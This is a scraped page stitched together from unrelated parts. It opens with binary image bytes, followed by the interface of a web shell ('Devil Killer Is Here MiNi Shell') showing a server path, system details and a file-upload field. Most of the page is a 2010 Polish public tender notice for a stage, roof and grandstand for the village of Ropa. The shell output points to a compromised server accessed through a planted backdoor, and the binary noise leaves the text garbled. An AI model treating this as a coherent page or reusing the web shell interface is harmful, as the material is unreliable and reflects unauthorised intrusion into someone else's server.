JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100315/71520-N-2010.html

<p class="kh_header"><b>Ropa: Dostawa estrady plenerowej z zadaszeniem i trybunami, 
jako element małej architektury dla wsi Ropa. 
CPV 44210000-5</b><br>
<b>Numer ogłoszenia: 71520 - 2010; data zamieszczenia: 15.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Kultury w Ropie , 38-312 Ropa, woj. małopolskie, tel. 18 353 06 11, faks 18 353 06 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gok.ropa.iap.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samomorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa estrady plenerowej z zadaszeniem i trybunami, 
jako element małej architektury dla wsi Ropa. 
CPV 44210000-5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa: 
A. Trybun modułowych, przestawnych, 
B. Sceny plenerowej o wymiarach 12m x 10m,
C. Zadaszenia do sceny plenerowej o wymiarach 12m x 10m.
2. Określenie przedmiotu zamówienia zgodnie z CPV: 
   -  28.11.23.20-9 Konstrukcje metalowe;  
   -  35.11.30.00-6  Siedziska z tworzyw sztucznych; 
   -  45.22.31.00-7  Montaż konstrukcji metalowych.

3. Opis przedmiotu zamówienia: 
  1) Zakres przedmiotu zamówienia obejmuje dostawę i montaż kompletnej, nowej 
     modułowej trybuny przestawnej (składanej) przeznaczonej do zamontowania na 
     obiekcie: Ilość miejsc 500. Dopuszcza się trybuny z większą ilością miejsc, 
     jeżeli wynika to z rozwiązań konstrukcyjnych danego modelu (producenta) przy 
     czym wartość zamówienia została oszacowana z uwzględnieniem trybuna na
     500 miejsc.
  2) Dostawę i montaż kompletnej, nowej estrady plenerowej składanej o wymiarach
      12m x 10 m, składającej się ze sceny ze schodami i poręczami oraz zadaszenia 
      estradowego z horyzontem i ścianami bocznymi. 
      Całość uzupełniona wszystkimi niezbędnymi akcesoriami.

4. Przedmiot zamówienia winien spełniać następujące wymogi:

A. Trybuny modułowe przestawne

A.1. Konstrukcja:
  1) podstawa konstrukcji nośnej trybuny winny stanowić ramy wykonane z rur lub 
      profili zamkniętych, ocynkowanych ogniowo o przekroju min. 50x2 mm, w tym:
- maksymalna głębokość trybun w stanie rozłożonym: 4,75 m.
- maksymalna długość jednego modułu trybuny: nie więcej niż 1,50 m,
- minimalna szerokość wejścia na trybunę: 1,2 m,
- minimalna szerokość przejścia pomiędzy rzędami: 0,45 m.
   2) dostarczona ilość elementów musi zapewnić ustawienie kilku oddzielnych 
       kompletnych zestawów trybun.  Zamawiający wymaga zastosowania min. 5
       modułów schodowych oraz min. 2 bariery ochronne zabezpieczające boki
       trybun stosownie do wymogów bezpieczeństwa wynikających z odrębnych
       przepisów.
   3) wymagana ilość rzędów w module: 6
   4) konstrukcja trybuny nie może zatrzymywać wody z opadów atmosferycznych.
   5) trybuna powinna być wyposażona w barierki tylne i boczne, wykonane 
       z rur  stalowych o wymiarach - minimum 35x2 mm.
   6) konstrukcja trybuny musi pozwalać na regulację wysokości (śruby regulujące 
       w zakresie minimum 4 cm), w celu zapewnienia poziomowania trybuny na 
       nierównym terenie oraz możliwości jej ustawienia na podłożu trawiastym 
       o niewielkich nierównościach terenu.
   7) nachylenie płaszczyzny siedzeń do podłoża minimum 20o.

A.2. Podłoga:
Podłoga trybuny wykonana ze stalowych krat pomostowych, cynkowanych ogniowo, nie dopuszcza się łączenia krat wzdłuż pomiędzy rzędami. Kraty muszą być mocowane do konstrukcji trybuny. 

A.3. Siedziska:
   1) siedziska z oparciami wykonane z tworzyw sztucznych i posiadające 
       następujące wymiary:
- szerokość min 41 cm;
- głębokość min. 34 cm.
- wysokość min. 32 cm.
   2)  siedziska muszą mieć między sobą zachowany stały odstęp wynoszący min. 
        3,00 cm
   3)  siedzisko musi posiadać wgłębienie do zamocowania tabliczki z numerem.
   4) Oparcie siedziska wykonane jako dwuwarstwowe tzn. z podwójną ścianką
   5) Siedzisko wykonane z tworzywa sztucznego w kolorze czerwonym odpornego
       na warunki atmosferyczne i promieniowanie UV,
   6) Siedzisko musi posiadać następujące certyfikaty:
-  klasyfikację ogniową potwierdzającą trudno zapalność,
-  klasyfikację w zakresie toksyczności produktów rozkładu i spalania 
    potwierdzającą zgodność z polską normą,

A.4.  Zabezpieczenie antykorozyjne:
   1) wszystkie elementy stalowe trybuny winny być zabezpieczone technologią 
       cynkowania ogniowego, 
   2) końcówki profili zamkniętych powinny być zabezpieczone przed korozją, 
       tj. wkładkami wykonanymi z tworzywa sztucznego w celu uniknięcia 
       gromadzenia się wody,
   3) wszystkie elementy złączne muszą być zabezpieczone przed korozją metodą 
       cynkowania galwanicznego, a nakrętki muszą dodatkowo posiadać wkładkę 
       zabezpieczającą przed przypadkowym odkręceniem.

A.5. Montaż:
   1) trybuna musi być przystosowana do wielokrotnego montażu i demontażu 
       w dowolnym miejscu wybranym przez Zamawiającego tzn. z możliwością 
       eksponowania przez cały rok,
   2) wielkość elementów konstrukcji musi być tak zaprojektowana aby była 
       możliwość wykonania montażu przez dwie osoby z użyciem standardowych 
       narzędzi i bez dodatkowego wyposażenia tzn. bez rusztowań, dźwigników, 
       podnośników, itp.

A.6. Bezpieczeństwo:
   1) konstrukcja trybuny, jej rozplanowanie powinno być zgodne z obowiązującymi
       normami i przepisami bezpieczeństwa, 
  2) Wykonawca zobowiązany jest do oferty załączyć obliczenia i rysunki 
      techniczne potwierdzające wytrzymałość oferowanych konstrukcji stalowych,

A.7. Wymogi dodatkowe:
Jako załączniki do składanej oferty wykonawca zobowiązany jest dostarczyć:
   1) rysunki techniczne przedstawiające oferowaną trybunę wraz z opisem 
       technicznym,
   2) instrukcję montażu trybuny,
   3) dokument potwierdzający zgodność oferty z wymogami określonymi w opisie 
      przedmiotu zamówienia, tzw. tabela zgodności przedstawionej oferty
      z wymogami określonymi w pkt. A.4 i pkt .A.5 - dotyczy każdej pozycji 
      poszczególnego punktu.

B. Scena plenerowa

B.1.  Konstrukcja 
1) scena o powierzchni 120.m2,
2) podesty sceniczne o wymiarach 1000mm x 2000mm lub innych umożliwiających
    montaż sceny o wymiarach 10 m x 12 m.
3) podesty sceniczne wykonane z  profili aluminiowych, wypełnione sklejką 
    wodoodporną pokrytą powierzchnią antypoślizgową, zwiększającą także
    odporność na ścieranie, z możliwością użytkowana w plenerze, jak również  
    we wnętrzach,
4) nogi teleskopowe o płynnej regulacji w zakresie min. 0,9 m do 1,6 m, 
5) wytrzymałość min. 750 KG/m2 ze współczynnikiem bezpieczeństwa min.1,2 , 
6) zewnętrzne obrzeże podestu wykonane z profili aluminiowych, wewnątrz
    wzmocnione gęstym użebrowaniem,
7) profile aluminiowe używane do wykonania podestu  muszą zapewniać wysoką 
    wytrzymałość elementów podestu, przy stosunkowo niewielkiej masie,
8) na zewnątrz profilu obrzeżowego wymagany kanał typu T- uniwersalny do
    montażu np. kotary, banerów reklamowych, itp.,
9) barierki zabezpieczające scenę z trzech stron,  spełniające wymogi przepisów, 
    wraz z uchwytami mocującymi do sceny i łącznikami (wysokość 1,1 m, 
    wytrzymałość na zginanie siłą poziomą - minimum 100 kg/mb.),
10) schody wraz z poręczami (2 szt.) o regulacji w tym samym zakresie wysokości
     jak scena - 1 kpl.,
11) wszelkie elementy stalowe konstrukcji sceny (okucia, śruby, itp.) muszą być
      zabezpieczone  przed korozją,

B.2.  Konfiguracja
1) scena powinna mieć możliwość ustawiania odrębnie od zadaszenia i mieć budowę modułową, 
2) scena ma stwarzać możliwość ustawiania jej  w różnych konfiguracjach do 
    wymiarów 12m x 10 m, 
3) każdy z podestów winien być ustawiony samodzielnie, gwarantując pełną 
    wytrzymałość.

B.3. Montaż sceny 
  1) konstrukcja sceny winna umożliwiać  montaż nóg do poszczególnych podestów 
      poprzez zaciśnięcie ich w odpowiednich gniazdach ,
  2) podesty łączone ze sobą uchwytami szybko złącznymi,
  3) zmontowana scena winna uzyskać pełną wytrzymałość bez dodatkowych 
      wzmocnień , usztywnień i śrub.
  4) parametry (czas) montażu - demontażu estrady nie dłuższy niż 4 godziny 
     w wykonaniu 2 osób.

B.4.  Wyposażenie dodatkowe sceny

1) wkładki ułatwiające poziomowanie podestów,
2) uchwyty łączące podesty,
3) komplet kluczy do montażu sceny.

C. Zadaszenie osłaniające scenę 12m x 10m

C.1.  Konstrukcja

1)  konstrukcja zadaszenia aluminiowa, kratownicowa,
2)  połączenia kratownic wykonane w systemie łączników stożkowo-klinowych,
3)  wymagane gęste podparcie plandeki - poprzeczne i podłużne użebrowanie 
    plandeki nie rzadsze niż 1,2 m,
4)  konstrukcja zadaszenia wykonana w postaci prostokątnej ramy o wymiarach 
    zewnętrznych 12 x 10  m ( z dokładnością ?20 mm),
5)  kształt zadaszenia dwuspadowy z odprowadzeniem wody na boki, uzyskany 
    poprzez zastosowanie w przedniej i tylnej części trójkątnych dźwigarów płaskich
6) słupy nośne zadaszenia powinny być usytuowane na zewnątrz (z boków) ramy
   nośnej (nie wchodzą w światło sceny o szerokości 12 m), 
7)  słupy zadaszenia powinny posiadać elementy zawiasowe umożliwiające 
    odnoszenie zmontowanych w poziomie słupów, do pozycji pionowej, 
8) podstawy słupów muszą być wyposażone w regulowane podpory i poziomiczki
    umożliwiające korygowanie nierówności terenu, 
9) kratownice słupów powinny posiadać szczeble umożliwiające łatwe wejście 
   na szczyt zadaszenia,
10) konstrukcja dachu ma stwarzać możliwość zawieszenia oświetlenia min 1000 kg.
11) osłony boczne (siatka lub plandeka) - koniecznie należy zachować 
     pionowość poprzez mocowanie u góry do kratownicy lub plandeki, a w dolnej 
     części do krawędzi sceny,
12) łączenie większości elementów zadaszenia za pomocą bolców samoblokujących 
     lub kołków,
13) konstrukcja zadaszenia sztywno mocowana do wózków poruszających się 
     wzdłuż słupów za pomocą czterech wyciągarek łańcuchowych o nośności 
     minimum 1000 kg każda,
14) pokrycie zadaszenia plandeką wodoszczelną, dodatkowo przytwierdzaną do
     podłoża odciągami,
15) ze względów transportowych i magazynowych żaden z elementów składowych  
     nie może być dłuższy niż 3 m. 

C.2.  Oplandekowanie

1) wykonane z materiału PCV o gramaturze minimum 650 g/m2 w kolorze
    zbliżonym do koloru osłon,
2) materiał plandekowy winien posiadać atest trudno zapalności,
3) konstrukcja pokrycia musi gwarantować pewne mocowanie oplandekowania
   na wszystkich krawędziach,
4) ściany boczne i tylne zadaszenia wykonane z plandeki - siatki o odpowiednim 
   współczynniku przepuszczalności (+/- 60%),
5) mocowanie ścian do zadaszenia - zarówno wszystkie razem lub każda oddzielnie,
6) wymagane nosidła do transportu pokrycia górnego i ścian zadaszenia.
 
C.3. Zabezpieczenie antykorozyjne

Wymagane jest, aby wszystkie elementy stalowe konstrukcji: okucia, bolce, 
sworznie, podstawy słupów, itp., były odpowiednio zabezpieczone przed korozją.

C.4.  Montaż zadaszenia

1) konstrukcja zadaszenia winna zapewniać jego montaż bez konieczności 
    wykonywania prac na wysokości,
2) mocowanie odciągów możliwe zarówno w miękkim gruncie (trawnik, boisko,
    plaża, itp.,  jak również w podłożu twardym asfalt, beton, itp.,
3) montaż zadaszenia powinno wykonać nie więcej niż cztery osoby, 
    w czasie nie dłuższym niż cztery godziny.

C.5. Wyposażenie dodatkowe zadaszenia

1) odciągi (pasy napinające),
2) elementy do mocowania odciągów w terenie miękkim - minimum 8 szt.,
3) elementy do mocowania odciągów w podłożu twardym - minimum 8 szt.,
4) skrzynka narzędziowa z odpowiednimi narzędziami do montażu.


5. Wymagania dodatkowe:

1) Gwarancja i serwis:
    - okres gwarancji: min. 36 miesięcy,
    - czas reakcji serwisowej: maksimum 3 dni,
    - Wykonawca zobowiązuje się do świadczenia serwisu pogwarancyjnego oraz 
      dostaw części zamiennych do przedmiotu zamówienia przez cały okres 
      eksploatacji, nie krócej jednak niż 10 lat od upływu gwarancji,
2) Wykonawca ponosi wyłączną odpowiedzialność za jakość i terminowość 
    świadczonego przedmiotu zamówienia,
3) dostawa estrady obejmuje transport na miejsce wskazane przez Zamawiającego,
   pokazowy montaż i demontaż, połączony ze szkoleniem obsługi.

6.  Do oferty należy załączyć: 
  
1) Opisy techniczne przedmiotu zamówienia,
2) Instrukcje obsługi i montażu,
3) Warunki gwarancji,
4) Atest trudno zapalności materiału pokrycia dachu i osłon,
5) Atest trudno zapalności sklejki z wykładziną antypoślizgową,
6) Certyfikat wytrzymałości zadaszenia,
7) Rekomendacja - Opinia techniczna ITB dotycząca zadaszeń,
8) Certyfikat wytrzymałości sceny,
9) Raport z badań TUV,
10) Deklaracja zgodności CE na wyciągarki do zadaszenia,
11) Katalog podestów scenicznych zawierający zdjęcia, dane techniczne oraz rozwiązania konstrukcyjne,
12) Rysunek konstrukcji zadaszenia zawierające główne wymiary umożliwiający
     Zamawiającemu ocenę zgodności konstrukcji z wymaganiami zawartymi w SIWZ
     13)  Katalogi, zdjęcia lub rysunki służące do oceny estetyki estrady,
14) Wszystkie dokumenty wymienione w części A.pkt.6, ppk 2) oraz w pkt.7..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.21.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość zamówienia nie przekraczającą kwot określonych w przepisach
wydanych na podstawie art. 11 ust. 8, Zamawiający nie wymaga od Wykonawców wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Pzp. - na zasadzie spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Pzp. - na zasadzie spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Pzp. - na zasadzie spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Pzp. - na zasadzie spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Pzp. - na zasadzie spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz oferty - wg załącznika nr 1 do SIWZ,
